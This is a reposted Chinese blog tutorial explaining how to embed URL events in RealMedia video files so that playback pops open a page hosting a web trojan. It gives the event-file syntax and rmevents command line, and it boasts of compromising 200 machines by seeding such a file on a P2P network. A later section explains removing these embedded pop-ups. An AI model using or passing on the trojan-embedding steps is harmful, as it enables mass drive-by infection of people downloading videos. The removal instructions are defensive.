注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

Study Desk

Share my desk with you!......

 
 
 

日志

 
 

在REAL影片中放木马  

2007-01-07 13:38:29|  分类: 计总会 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 

引用

£亢龙有悔£在REAL影片中放木马

经常遇到rm影片播放时弹出网页,一直不知道怎么回事!

在Real影片中放木马在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,我下了一个这样的小木马,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。使用HelixProducerPlus9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口.

新建一个文本文件rmevents.txt.输入:u00:01:00.000:01:30.0http://yjs.bit.edu.cn/bbs我来解释一下,它意思是说在00:01:00.000:01:30.0这个时间范围内打开后面的URL,后面的URL就是我们的木马地址。输入rmevents-i电影.rm-ermevents.txt-o电影1.rm这个命令,生成的电影.rm就是我们的木马文件了。http://yjs.bit.edu.cn/bbs这个地址是你做好的网页木马的地址,不管是动鲨木马啊,还是EXE2BMP的木马,还是什么CHM木马.防御方法更简单,嘿嘿,不看电影就没事了。要不就不用Realpalyer看吧,换别的播放器。

去除realoneplay,里的网页问题这个弹出的网页是由一开始压制影片的人压进去的广告页。可以通过HelixProducerPlusV9.01的rmevents.exe编辑掉。

方法一:在你的安装目录C:\ProgramFiles\Real\HelixProducerPlus\RealMediaEditor默认是这个目录,里有一个rmevents.exe在命令提示行cmd.exe下进入这个目录,运行rmevents.exe然后建立一个内容为空的events.txt文件rmevents-iinput.rm-eevents.txt-ooutput.rminput.rm为有广告的原来的rmvb影片。output.rm为转换后的新影片名称。可以自定义。这个相当于覆盖掉原来的Event设置,对RMVB也有效。

方法二:直接运行C:\ProgramFiles\Real\HelixProducerPlus\RealMediaEditor目录下的rmedtgui.exe效果跟上面的命令提示行下是一样的。运行rmedtgui.exe后,打开有广告的rmvb影片,选择菜单里的tools——》mergeevents,打开新建立的空白events.txt,再在file下选择saveas保存修改好的文件。HelixProducerPlusV9.01在自由下载提供下载教你在RM中插入网址制作开始先准备个正常的RM文件下载个HelixProducerPlus安装。

在准备个文本命令文件文本命令如下实例:在00:20.0(时分秒毫)—01:10.0时让欣赏者自动弹出http://yjs.bit.edu.cn/bbs主页在03:10.0(时分秒毫)—03:59.0时让欣赏者自动弹出http://yjs.bit.edu.cn/bbs主页1、编辑事件文件新建一个记事本文件,命名为event.txt(可随意),输入以下内容:u00:20.001:10.0http://yjs.bit.edu.cn/bbsu03:10.003:59.0http://yjs.bit.edu.cn/bbs存盘后退出解释:u表示URL事件,00:20.0是起启时间,01:10.0是结束时间,后面是指定的网页.

下一步进入HelixProducerPlus的安装目录下的RealMediaEditor子目录,双击运行rmedtgui.exe文件,从file菜单Open打开一个Rm文件,从菜单栏的tools(工具)中选择MergeEvents(合并事件),在弹出的对话框中选择刚才编辑的event.txt文件,确定后Rmedtgui开始合并事件,合并结束后,请将含有事件文件的RM文件另行保存。整个过程应当在15分钟以内完成,还是相当快的。

  评论这张
 
阅读(174)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017